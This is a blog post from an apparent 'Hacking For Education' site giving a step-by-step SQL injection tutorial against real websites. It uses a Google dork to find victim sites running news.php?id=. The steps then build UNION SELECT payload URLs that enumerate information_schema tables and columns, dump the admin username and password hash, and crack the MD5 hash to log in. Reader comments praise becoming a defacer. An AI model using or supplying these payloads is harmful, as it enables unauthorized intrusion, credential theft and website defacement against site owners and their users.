Keywords you should/must know :
Character : ', -
Comments : /*, --
INFORMATION :

  1. "Information_schema" only worked on MYSQL Versi 5.x and above.
  2. "Information_schema" not worked on MYSQL Versi 4.x.xx and below.
Google Dork that you should use is "inurl:news.php?id="
Go to www.google.com and search for victim site with that dork.


Step 1

[site]/news.php?id=1
--- Add character at the end of the url to look at any site so we can find if the site is vuln to SQL Injection or not.


Example :
[site]/news.php?id=1'
atau
[site]/news.php?id=-1


Example Error came out :
Warning: mysql_fetch_array(): supplied argument is not a valid MYSQL result resource in D:\inetpub\wwwroot\ajpower.net\html\news.php on line

Step 2

Find how many table was in the database.
-- Put +order+by+1-- at the end of the url.


Example :
[site]/news.php?id=1+order+by+1--
or
[site]/news.php?id=1+order+by+1/* Check it gradually
[site]/news.php?id=1+order+by+2/*
[site]/news.php?id=1+order+by+3/* Until error come out on it page.
[site]/news.php?id=1+order+by+4/* Error came out on table number 4!
And so for this tutorial, the total table in the database for the site is 3
.

Step 3

Use the Union Select command with sequence table obtained during the second step to retrieve the numbers that we will use later. In the present case, the sequence numbers are up three tables.


--- Command will be used : +union+select+1,2,3--
Example :
[site]/news.php?id=1+union+select+1,2,3--
 Figures 2 pop out on the page site.



--- Then, we enter the version() on that figures 2,
Example :
[site]/news.php?id=1+union+select+1,version(),3--
and the version will appear in the figures on the page.

Example :
5.1.47-community-log

INFORMATION :

user() = getting 
username that used with the database

(Contoh : mae21@localhost)
database() = getting the database name
(Contoh : mae21_db)
version() = getting what version of their mysql
(Contoh : 5.1.47-community-log)
Step 4

To retrieve all table names on the site, use this command

table_name

--- Put in the numbers (2) that came out earlier.
+from+information_schema.tables--
--- Put it at the end of the url.


Example :
[site]/news.php?id=1+union+select+1,table_name,3+from+information_schema.tables--

Step 5
Copy all the contents of the information contained in the table.

group_concat(table_name)

--- Put in the numbers (2) that came out earlier.
+from+information_schema.tables+where+table_schema=database()--
--- Put it at the end of the url.


Example :
[site]/news.php?id=1+union+select+1,group_concat(table_name),3+from+
information_schema.tables+where+table_schema=database()--


Step 6
Remove the existing content in TABLE

group_concat(column_name)
--- Put in the numbers (2) that came out earlier.
+from+information_schema.columns+where+table_name=0xHEXA--
(PUT THE TABLE NAME ALREADY CONVERTED TO HEXADECIMEL)


INFORMATION:
Website that can be used to convert the table name to hexadecimel

Column that we will use as for example is ADMIN.
When it converted the result was 41444D494E 
Example :
[site]/news.php?id=1+union+select+1,group_concat(column_name),3+from+
information_schema.columns+where+table_name=0x41444D494E--


Step 7

Remove the contents of the results we have obtained from the table ADMIN


concat_ws(0x3a,"column names contained in the ADMIN's table")

--- Put in the numbers (2) that came out earlier.
+from+Admin--
--- Original's column


Example :
[site]/news.php?id=1+union+select+1,concat_ws(0x3a,id,username,password),3+from+admin--
And we will get admin username and password data for the website.
The information coming out is as follows :
 "webmaster admin:8dded6912a401ad44ec9b688fd124e22"


Decrypt MD5 Hash of the information contained in www.md5decrypter.co.uk

8dded6912a401ad44ec9b688fd124e22
= "iluvmyself" (decrypted!)

Now you have the username and password for the website.

Step 8 (Last Step)

Find the Login page for admin..
"
Happy trying it and enjoy hacking for education ..." :)

2 comments

  1. hasmadi  

    em.. menarik nie

  2. xEEx  

    terima kasih kerana memberi respon dan tahniah kerana sudah berjaya menjadi defacer.. :)

Post a Comment

Related Posts Plugin for WordPress, Blogger...
© Copyright XAND™ | Hacking For Education 2010 - 2011. Powered by Blogger.

Networked Blog

Follow Me